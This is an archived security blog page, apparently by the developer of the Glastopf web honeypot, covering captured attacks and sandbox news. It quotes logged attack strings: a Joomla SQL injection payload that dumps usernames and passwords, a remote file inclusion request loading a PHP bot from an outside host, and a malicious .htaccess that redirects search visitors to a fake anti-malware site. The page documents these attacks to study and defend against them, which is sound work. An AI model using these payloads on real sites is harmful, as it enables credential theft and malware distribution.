Dies ist das Archiv für 27 January 2009.

« ältere Einträge
Next Page »

Das SQL Injection Leiden

Abgelegt unter Allgemein am 27 January 2009
Other Languages: None

Jeremiah Grossman (Blog), CTO von WhiteHat Security hat einen guten Artikel über SQL Injection in Security Horizon: Winter 2009 Edition (Direktlink) veröffentlicht:

Auszug:

SQL Injection, Eye of the Storm
In 2008 SQL Injection became the leading method of malware distribution, infecting millions of Web pages and foisting browser-based exploits upon unsuspecting visitors. The ramifications to online businesses include data loss, PCI fines, downtime, recovery costs, brand damage, and revenue decline when search engines blacklist them. According to WhiteHat Security1, 16 percent of websites are vulnerable to SQL Injection. This is likely under-reported given that the statistics are largely based on top-tier Web properties that employ a website vulnerability management solution to identify the problem. The majority of websites do not and as such may be completely unaware of the extent of the issue. In addition, some recommended security best-practice have ironically benefited malicious hackers. Websense now reports that “60 percent of the top 100 most popular Web sites have either hosted or been involved in malicious activity in the first half of 2008.” Let’s examine the forces that have aligned to create the storm that allows SQL Injection to thrive.

Dein Kommentar »

Roundcube

Abgelegt unter Glastopf, Honeypot am 26 January 2009
Other Languages: None

Am 16.01. habe ich den Glastopf um die RoundCube Signaturen erweitert (Changeset:45) und nun kann ich mich in die Liste der RoundCube (Projekt Seite) “Opfer” einreihen. Interessante Berichte dazu gibt es von SANS Internet Storm Center (erster Teil, zweiter Teil), ASERT Arbor Networks (Statistiken), Heise UK (Vulnerability in 0.2-1.alpha und 0.2-3.beta, das CVE dazu), Virus Blog (Webmail Roundcube Scanning) und der Fix von Roundcube (Sourceforge Link).

Hier eines meiner Beispiele:
2009-01-20 23:36:01 - 196.200.*.* - GET /roundcube/
und
2009-01-20 23:36:02 - 196.200.*.* - GET /webmail/
Die IP gehört zu einer größeren marokkanischen Universität.

1 Kommentar »

Masquerade: simulating a thousand victims

Abgelegt unter Honeypot, Sicherheit, Web Honeypot am 25 January 2009
Other Languages: None

In ;login: “The USENIX Magazine” December 2008, Volume 33, Number 6 (Weitere Informationen) haben Sam Small, Joshua Mason, Ryan MacArthur und Fabian Monrose einen Artikel über Web Honeypots veröffentlicht.
weiterlesen »

Dein Kommentar »

CWSandbox Webcast Rückblick

Abgelegt unter CWSandbox, Sandbox am 23 January 2009
Other Languages: None

Am 21.01 hat Sunbelt ein Webcast über die CWSandbox gehalten.
Die Aufzeichnung ist auf der Sunbelt Webpage zu finden (direkt Link).

Fragen, die während dem Webcast gestellt wurden, können in der FAQ nachgelesen werden (Sunbelt:FAQ).

Für Teilnehmer gab es als Dank noch ein VIPRE consumer key mit einjähriger Laufzeit (VIPRE Produkt Details).

Dein Kommentar »

FU** SQL Anfragen

Abgelegt unter Glastopf, Honeypot, Sicherheit am 23 January 2009
Other Languages: None

Beim Durchstöbern der glastopf Logs bin ich auf die ersten SQL-Injektionen (de:wiki) gestoßen. Das Fangen dieser ist in der unstable (trac:unstable) möglich, hat aber aktuell noch ein paar Nebenwirkungen (trac:Ticket #27).

Folgende Varianten wurden geloggt:

-1+union+all+select+1,2,concat(username,char(58),password) FU**ISRAEL,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
Interessanter username…

Ziel war:

index.php?option=com_ownbiblio&view=catalogue&catid=

Dabei wird die Joomla Component Ownbiblio SQL Injection Vulnerability (milw0rm:6730) ausgenützt. Diese Schwachstelle wurde am 2008-10-11 in die milw0rm Datenbank eingetragen.

Weitere Ziele:

index.php?option=com_rsgallery&page=inline&catid=
Schon etwas älter: Mambo/Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerability (milw0rm:4691)

index.php?option=com_pccookbook&page=viewuserrecipes&user_id
Joomla Component pccookbook SQL Injection 2008-02-18 (milw0rm:5145)

index.php?option=com_simpleboard&func=view&catid
Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability 2008-02-27 (milw0rm:5195)

catalogue.php?cat=
AShop Deluxe 4.x (catalogue.php cat) Remote SQL Injection Exploit 2008-06-30 (milw0rm:5976)

Mal was aktuelles:
index.php?option=com_pccookbook&page=viewrecipe&recipe_id
War am selben Tag im glastopf wie die Veröffentlichung bei milw0rm. Wir kommen dem 0day näher.
Joomla com_pccookbook (recipe_id) Blind SQL Injection Exploit 2009-01-19 (milw0rm:7824)

Dein Kommentar »

Sunbelt CWSandbox webinar

Abgelegt unter CWSandbox, Sandbox am 20 January 2009
Other Languages: None

Sunbelt hält morgen (21.01) Vormittag und Nachmittag einen Webinar (wiki:Webinar) über die CWSandbox (Informationen zu Sunbelts CWS).
Zeitpunkt: 10 am and 2 pm EDT = UTC – 4 = MEZ – 5

Anmeldung 10am: hier
Anmeldung 2pm: hier

Informationen dazu solte es hier geben.

Dein Kommentar »

vict***.com

Abgelegt unter Glastopf, Honeypot, RFI, Sicherheit am 16 January 2009
Other Languages: deutsch

Some stuff shouldn’t appear in the Glastopf log. Getting for example attacks from Joomla/Mambo pages or the local kayac clubs are quite usual and seen very often. But a serious organization which makes their money with IT consulting/service and products should have a eye on their stuff!

//ws/get_events.php?includedir=http://www.vict***.com/***bot.txt??

The attacker IP is from the Netherlands and appears in several Blacklists. ***bot.txt is a common PHP bot.

From the vict*** About Us:

IT for Business Intelligence and Business Tools…is our work mission.
Vict*** is a full-fledged IT and e-Business Communication company providing multidimensional services to its clients.[...]

Update:

Dear Sir,
This is in reference to the mail sent to us on 17th January,2009.
We are pleased to inform you that we have removed the web page, http://www.vict***.com/newphpbot.txt
as desired by you. Kindly check.

Regards,
Aditi Singhal

Web Coordinator,
For M*** Software Solutions

2 Kommentare »

Glastopf Webseiten online

Abgelegt unter Glastopf, Honeypot am 10 January 2009
Other Languages: deutsch

glastopf

Yesterday evening the webinterface was finally finished and now, the important parts are together.

Although the webinterface lacks some features, fore example a search function an the possibility to skim through the results

Project Page: http://glastopf.1durch0.de
Project Trac: http://trac.1durch0.de/trac
Glastopf Webinterface: Trac Page

The first stable glaspot version was release some time ago and the new release is already in work. Some features has been remove before the first release which would be integrated in the next version.

2 Kommentare »

.htaccess redirect to malware

Abgelegt unter Malware, RFI, Sicherheit am 8 January 2009
Other Languages: None

301-redirect

Niels Provos ist auf eine interessante Art der Webseiten-Kompromittierung gestoßen(Blog Artikel):

Eine Webseite leitete den Betrachter, sofern er diese über eine Google-Suchanfrage betrat, weiter zu einem fake Anti Malware Produkt. Technische realisiert wurde dies durch eine per Remote File Inclusion (en:Wiki:RFI) eingeschleuste .htaccess Datei. Möglich war dies durch eine nicht geschlossene Schwachstelle in einer Web-Application.

Inhalt der .htaccess Datei:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.204/in.html?s=xx [R,L]

Wie man sieht, werden sämliche Anfragen, die eine der sechs Suchmaschinen als Referer beinhalten, auf die das Fake Tool enthaltene Seite weiter geleitet (en:Wiki:URLredirection).

Dein Kommentar »

Sandbox News

Abgelegt unter CWSandbox, Joebox, Malware, Sandbox, Sicherheit am 6 January 2009
Other Languages: None

Seit dem 22.12. (Blog Eintrag) letzten Jahres versteht sich die CWSandbox (Project Page) prima mit PDF Dateien. Diese werden mit dem Acrobat Reader 8.1.1, der bekannte Schwachstellen (Bericht) besitzt, geöffnet. Dessen Verhalten und die durch die Datei ausgelösten Änderungen auf der Festplatte werden protokolliert und unter Umständen stößt man auf schädliches Verhalten.
Ein Beispiel Report findet man auf der Projekt Seite (Example Report).
Die von Joe (joebox Project Page) angestoßene Frage nach einer Differenzierung zwischen regulärem und schädlichen Verhalten wurde folgender maßen beantwortet:

that ‘diff’ function is something we’re working on actually now. The idea would be to have a library of good/clean analysis for different applications and blank docs, and be able to diff the malicious doc analysis against the baseline ‘good’ analysis.

Da sind wir doch gespannt, was wir bald zu sehen bekommen.

Neu am Sandbox Himmel ist Zero Wine (Sourceforge Project Page), eine auf Wine (Project Page) basierende Open Source Sandbox (en:Wikipedia). Auf der joebox Projekt Seite findet man einen kurzen Bericht (News Eintrag) und die Möglichkeit die Funktionen von Zero Wine zu testen (Test Seite).

Dein Kommentar »

« ältere Einträge
Next Page »
Design von Robin Hastings - Farbanpassung von Ulysses Ronquillo